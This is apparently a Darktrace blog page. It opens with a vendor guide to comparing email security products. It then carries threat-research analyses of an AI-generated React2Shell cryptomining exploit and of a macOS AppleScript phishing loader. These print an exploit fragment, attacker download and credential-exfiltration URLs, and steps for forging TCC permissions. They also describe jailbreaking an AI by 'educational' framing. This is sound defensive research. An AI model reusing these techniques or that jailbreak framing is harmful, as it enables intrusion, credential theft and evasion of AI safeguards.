Evaluating Email Security: How to Select the Best Solution for Your Organization
In today’s saturated market for email security, it can be difficult to cut through the noise of AI hype and vendor claims. CISOs should be using a structured evaluation framework to support informed, objective comparisons of different vendors – to allow them to make the best decision for their organization.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Carlos Gray
Senior Product Marketing Manager, Email
Share
21
May 2025
When evaluating email security solutions, it’s crucial to move beyond marketing claims and focus on real-world performance. One of the most effective ways to achieve this is through an A/B comparison approach – a side-by-side evaluation of vendors based on consistent, predefined criteria.
This method cuts through biases, reveals true capability differences, and ensures that all solutions are assessed on a level playing field. It’s not just about finding an objectively good solution – it’s about finding the best solution for your organization’s specific needs.
An A/B comparison approach is particularly effective for three main reasons:
Eliminates bias: By comparing solutions under identical conditions, it’s easier to spot differences in performance without the fog of marketing jargon.
Highlights real capabilities: Direct side-by-side testing exposes genuine strengths and weaknesses, making it easier to judge which features are impactful versus merely decorative.
Encourages objective decision-making: This structured method reduces emotional or brand-driven decisions, focusing purely on metrics and performance.
Let’s look at the key factors to consider when setting up your evaluation to ensure a fair, accurate, and actionable comparison.
Deployment: Setting the stage for fair evaluation
To achieve a genuine comparison, deployment must be consistent across all evaluated solutions:
Establish the same scope: All solutions should be granted identical visibility across relevant tenants and domains to ensure parity.
Set a concrete timeline: Deploy and test each solution with the same dataset, at the same points in time. This allows you to observe differences in learning periods and adaptive capabilities.
Equal visibility and synchronized timelines prevent discrepancies that could skew your understanding of each vendor’s true capabilities. But remember – quicker results might not equal better learning or understanding!
Tuning and configurations: Optimizing for real-world conditions
Properly tuning and configuring each solution is critical for fair evaluation:
Compare on optimal performance: Consult with each vendor to understand what optimal deployment looks like for their solution, particularly if machine learning is involved.
Consider the long term: Configuration adjustments should be made with long-term usage in mind. Short-term fixes can mask long-term challenges.
Data visibility: Ensure each solution can retain and provide search capabilities on all data collected throughout the evaluation period.
These steps guarantee that you are comparing fully optimized versions of each platform, not underperforming or misconfigured ones.
Evaluation: Applying consistent metrics
Once deployment and configurations are aligned, the evaluation itself must be consistent, to prevent unfair scoring and help to identify true differences in threat detection and response capabilities.
Coordinate your decision criteria: Ensure all vendors are measured against the same set of criteria, established before testing begins.
Understand vendor threat classification: Each vendor may have different ways of classifying threats, so be sure to understand these nuances.
Maintain communication: If results seem inaccurate, engage with the vendors. Their response and remediation capabilities are part of the evaluation.
Making a decision: Look beyond the metrics
When it comes to reviewing the performance of each solution, it’s important to both consider and look beyond the raw data. This is about choosing the solution that best aligns with your specific business needs, which may include factors and features not captured in the results.
Evaluate based on results: Consider accuracy, threats detected, precision, and response effectiveness.
Evaluate beyond results: Assess the overall experience, including support, integrations, training, and long-term alignment with your security strategy.
Review and communicate: Internally review the findings and communicate them back to the vendors.
Choosing the right email security solution isn’t just about ticking boxes, it’s about strategic alignment with your organization’s goals and the evolving threat landscape. A structured, A/B comparison approach will help ensure that the solution you select is truly the best fit.
For a full checklist of the features and capabilities to compare, as well as how to perform a commercial and technical evaluation, check out the full Buyer’s Checklist for Evaluating Email Security.
[related-resource]
A Buyer’s Checklist for Evaluating Email Security
Get the most effective system for comparing email security solutions – based on real-world performance and measurable capabilities.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Why Organizations are Moving to Label-free, Behavioral DLP for Outbound Email
Modern data loss doesn’t always look like a regex match. It can look like everyday communication slightly out of context. Here’s how a domain specific language model paired with behavioral learning protects labeled and unlabeled data without slowing business down.
Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace
During a customer trial of Darktrace / EMAIL and Darktrace / IDENTITY, Darktrace detected an adversary-in-the-middle (AiTM) attack that compromised a user’s Office 365 account via a business email compromise (BEC) phishing email. Following the breach, the compromised account was used to launch both internal and external phishing campaigns.
How Darktrace is ending email security silos with new capabilities in cross-domain detection, DLP, and native Microsoft integrations
Darktrace is delivering a major evolution in email security, uniting true AI-powered cross-domain detection, label-free behavioral DLP, and Microsoft-native automation – to catch the 17% of threats that SEGs miss.
AI/LLM-Generated Malware Used to Exploit React2Shell
Introduction
To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.
A recently observed intrusion against Darktrace’s Cloudypots environment revealed a fully AI‑generated malware sample exploiting CVE-2025-55182, also known as React2Shell. As AI‑assisted software development (“vibecoding”) becomes more widespread, attackers are increasingly leveraging large language models to rapidly produce functional tooling. This incident illustrates a broader shift: AI is now enabling even low-skill operators to generate effective exploitation frameworks at speed. This blog examines the attack chain, analyzes the AI-generated payload, and outlines what this evolution means for defenders.
Initial access
The intrusion was observed against the Darktrace Docker honeypot, which intentionally exposes the Docker daemon internet-facing with no authentication. This configuration allows any attacker to discover the daemon and create a container via the Docker API.
The attacker was observed spawning a container named “python-metrics-collector”, configured with a start up command that first installed prerequisite tools including curl, wget, and python 3.
Figure 1: Container spawned with the name ‘python-metrics-collector’.
Subsequently, it will download a list of required python packages from
hxxps://pastebin[.]com/raw/Cce6tjHM,
Finally it will download and run a python script from:
hxxps://smplu[.]link/dockerzero.
This link redirects to a GitHub Gist hosted by user “hackedyoulol”, who has since been banned from GitHub at time of writing.
Notably the script did not contain a docker spreader – unusual for Docker-focused malware – indicating that propagation was likely handled separately from a centralized spreader server.
Deployed components and execution chain
The downloaded Python payload was the central execution component for the intrusion. Obfuscation by design within the sample was reinforced between the exploitation script and any spreading mechanism. Understanding that docker malware samples typically include their own spreader logic, the omission suggests that the attacker maintained and executed a dedicated spreading tool remotely.
The script begins with a multi-line comment: """ Network Scanner with Exploitation Framework Educational/Research Purpose Only Docker-compatible: No external dependencies except requests """
This is very telling, as the overwhelming majority of samples analysed do not feature this level of commentary in files, as they are often designed to be intentionally difficult to understand to hinder analysis. Quick scripts written by human operators generally prioritize speed and functionality over clarity. LLMs on the other hand will document all code with comments very thoroughly by design, a pattern we see repeated throughout the sample. Further, AI will refuse to generate malware as part of its safeguards.
The presence of the phrase “Educational/Research Purpose Only” additionally suggests that the attacker likely jailbroke an AI model by framing the malicious request as educational.
When portions of the script were tested in AI‑detection software, the output further indicated that the code was likely generated by a large language model.
Figure 2: GPTZero AI-detection results indicating that the script was likely generated using an AI model.
The script is a well constructed React2Shell exploitation toolkit, which aims to gain remote code execution and deploy a XMRig (Monero) crypto miner. It uses an IP‑generation loop to identify potential targets and executes a crafted exploitation request containing:
A deliberately structured Next.js server component payload
A chunk designed to force an exception and reveal command output
A child process invocation to run arbitrary shell commands
def execute_rce_command(base_url, command, timeout=120): """ ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE DO NOT MODIFY THIS FUNCTION Returns: (success, output) """ try: # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)
This function is initially invoked with ‘whoami’ to determine if the host is vulnerable, before using wget to download XMRig from its GitHub repository and invoking it with a configured mining pool and wallet address.
Many attackers do not realise that while Monero uses an opaque blockchain (so transactions cannot be traced and wallet balances cannot be viewed), mining pools such as supportxmr will publish statistics for each wallet address that are publicly available. This makes it trivial to track the success of the campaign and the earnings of the attacker.
Figure 3: The supportxmr mining pool overview for the attackers wallet address
Based on this information we can determine the attacker has made approx 0.015 XMR total since the beginning of this campaign, which as of writing is valued at £5. Per day, the attacker is generating 0.004 XMR, which is £1.33 as of writing. The worker count is 91, meaning that 91 hosts have been infected by this sample.
Conclusion
While the amount of money generated by the attacker in this case is relatively low, and cryptomining is far from a new technique, this campaign is proof that AI based LLMs have made cybercrime more accessible than ever. A single prompting session with a model was sufficient for this attacker to generate a functioning exploit framework and compromise more than ninety hosts, demonstrating that the operational value of AI for adversaries should not be underestimated.
CISOs and SOC leaders should treat this event as a preview of the near future. Threat actors can now generate custom malware on demand, modify exploits instantly, and automate every stage of compromise. Defenders must prioritize rapid patching, continuous attack surface monitoring, and behavioral detection approaches. AI‑generated malware is no longer theoretical — it is operational, scalable, and accessible to anyone.
Analyst commentary
It is worth noting that the downloaded script does not appear to include a Docker spreader, meaning the malware will not replicate to other victims from an infected host. This is uncommon for Docker malware, based on other samples analyzed by Darktrace researchers. This indicates that there is a separate script responsible for spreading, likely deployed by the attacker from a central spreader server. This theory is supported by the fact that the IP that initiated the connection, 49[.]36.33.11, is registered to a residential ISP in India. While it is possible the attacker is using a residential proxy server to cover their tracks, it is also plausible that they are running the spreading script from their home computer. However, this should not be taken as confirmed attribution.
Credit to Nathaniel Bill (Malware Research Engineer), Nathaniel Jones ( VP Threat Research | Field CISO AI Security)
AppleScript Abuse: Unpacking a macOS Phishing Campaign
Introduction
Darktrace security researchers have identified a campaign targeting macOS users through a multistage malware campaign that leverages social engineering and attempted abuse of the macOS Transparency, Consent and Control (TCC) privacy feature.
The malware establishes persistence via LaunchAgents and deploys a modular Node.js loader capable of executing binaries delivered from a remote command-and-control (C2) server.
Due to increased built-in security mechanisms in macOS such as System Integrity Protection (SIP) and Gatekeeper, threat actors increasingly rely on alternative techniques, including fake software and ClickFix attacks [1] [2]. As a result, macOS threats r[NJ1] ely more heavily on social engineering instead of vulnerability exploitation to deliver payloads, a trend Darktrace has observed across the threat landscape [3].
Technical analysis
The infection chain starts with a phishing email that prompts the user to download an AppleScript file named “Confirmation_Token_Vesting.docx.scpt”, which attemps to masquerade as a legitimate Microsoft document.
Figure 1: The AppleScript header prompting execution of the script.
Once the user opens the AppleScript file, they are presented with a prompt instructing them to run the script, supposedly due to “compatibility issues”. This prompt is necessary as AppleScript requires user interaction to execute the script, preventing it from running automatically. To further conceal its intent, the malicious part of the script is buried below many empty lines, assuming a user likely will not to the end of the file where the malicious code is placed.
Figure 2: Curl request to receive the next stage.
This part of the script builds a silent curl request to “sevrrhst[.]com”, sending the user’s macOS operating system, CPU type and language. This request retrieves another script, which is saved as a hidden file at in ~/.ex.scpt, executed, and then deleted.
The retrieved payload is another AppleScript designed to steal credentials and retrieve additional payloads. It begins by loading the AppKit framework, which enables the script to create a fake dialog box prompting the user to enter their system username and password [4].
Figure 3: Fake dialog prompt for system password.
The script then validates the username and password using the command "dscl /Search -authonly <username> <password>", all while displaying a fake progress bar to the user. If validation fails, the dialog window shakes suggesting an incorrect password and prompting the user to try again. The username and password are then encoded in Base64 and sent to: https://sevrrhst[.]com/css/controller.php?req=contact&ac=<user>&qd=<pass>.
Figure 4: Requirements gathered on trusted binary.
Within the getCSReq() function, the script chooses from trusted Mac applications: Finder, Terminal, ScriptEditor, osascript, and bash. Using the codesign command codesign -d --requirements, it extracts the designated code-signing requirement from the target application. If a valid requirement cannot be retrieved, that binary is skipped. Once a designated requirement is gathered, it is then compiled into a binary trust object using the Code Signing Requirement command (csreq). This trust object is then converted into hex so it can later be injected into the TCC SQLite database.[NB2]
To bypass integrity checks, the TCC directory is renamed to com.appled.tcc using Finder. TCC is a macOS privacy framework designed to restrict application access to sensitive data, requiring users to explicitly grant permissions before apps can access items such as files, contacts, and system resources [1].
Figure 5: TCC directory renamed to com.appled.TCC.
Figure 6: Example of how users interact with TCC.
After the database directory rename is attempted, the killall command is used on the tccd daemon to force macOS to release the lock on the database. The database is then injected with the forged access records, including the service, trusted binary path, auth_value, and the forged csreq binary. The directory is renamed back to com.apple.TCC, allowing the injected entries to be read and the permissions to be accepted. This enables persistence authorization for:
Full disk access
Screen recording
Accessibility
Camera
Apple Events
Input monitoring
The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions.
Although the malware is attempting to manipulate TCC state via Finder, a trusted system component, Apple has introduced updates in recent macOS versions that move much of the authorization enforcement into the tccd daemon. These updates prevent unauthorized permission modifications through directory or database manipulation. As a result, the script may still succeed on some older operating systems, but it is likely to fail on newer installations, as tcc.db reloads now have more integrity checks and will fail on Mobile Device Management (MDM) [NB5] systems as their profiles override TCC.
Figure 7: Snippet of decoded Base64 response.
A request is made to the C2, which retrieves and executes a Base64-encoded script. This script retrieves additional payloads based on the system architecture and stores them inside a directory it creates named ~/.nodes. A series of requests are then made to sevrrhst[.]com for:
/controller.php?req=instd
/controller.php?req=tell
/controller.php?req=skip
These return a node archive, bundled Node.js binary, and a JavaScript payload. The JavaScript file, index.js, is a loader that profiles the system and sends the data to the C2. The script identified the system platform, whether macOS, Linux or Windows, and then gathers OS version, CPU details, memory usage, disk layout, network interfaces, and running process. This is sent to https://sevrrhst[.]com/inc/register.php?req=init as a JSON object. The victim system is then registered with the C2 and will receive a Base64-encoded response.
Figure 8: LaunchAgent patterns to be replaced with victim information.
The Base64-encoded response decodes to an additional Javacript that is used to set up persistence. The script creates a folder named com.apple.commonjs in ~/Library and copies the Node dependencies into this directory. From the C2, the files package.json and default.js are retrieved and placed into the com.apple.commonjs folder. A LaunchAgent .plist is also downloaded into the LaunchAgents directory to ensure the malware automatically starts. The .plist launches node and default.js on load, and uses output logging to log errors and outputs.
Default.js is Base64 encoded JavaScript that functions as a command loop, periodically sending logs to the C2, and checking for new payloads to execute. This gives threat actors ongoing and the ability to dynamically modify behavior without having to redeploy the malware. A further Base64-encoded JavaScript file is downloaded as addon.js.
Addon.js is used as the final payload loader, retrieving a Base64-encoded binary from https://sevrrhst[.]com/inc/register.php?req=next. The binary is decoded from Base64 and written to disk as “node_addon”, and executed silently in the background. At the time of analysis, the C2 did not return a binary, possibly because certain conditions were not met. However, this mechanism enables the delivery and execution of payloads. If the initial TCC abuse were successful, this payload could access protected resources such as Screen Capture and Camera without triggering a consent prompt, due to the previously established trust.
Conclusion
This campaign shows how a malicious threat actor can use an AppleScript loader to exploit user trust and manipulate TCC authorization mechanisms, achieving persistent access to a target network without exploiting vulnerabilities.
Although recent macOS versions include safeguards against this type of TCC abuse, users should keep their systems fully updated to ensure the most up to date protections. These findings also highlight the intentions of threat actors when developing malware, even when their implementation is imperfect.
Credit to Tara Gould (Malware Research Lead) Edited by Ryan Traill (Analyst Content Lead)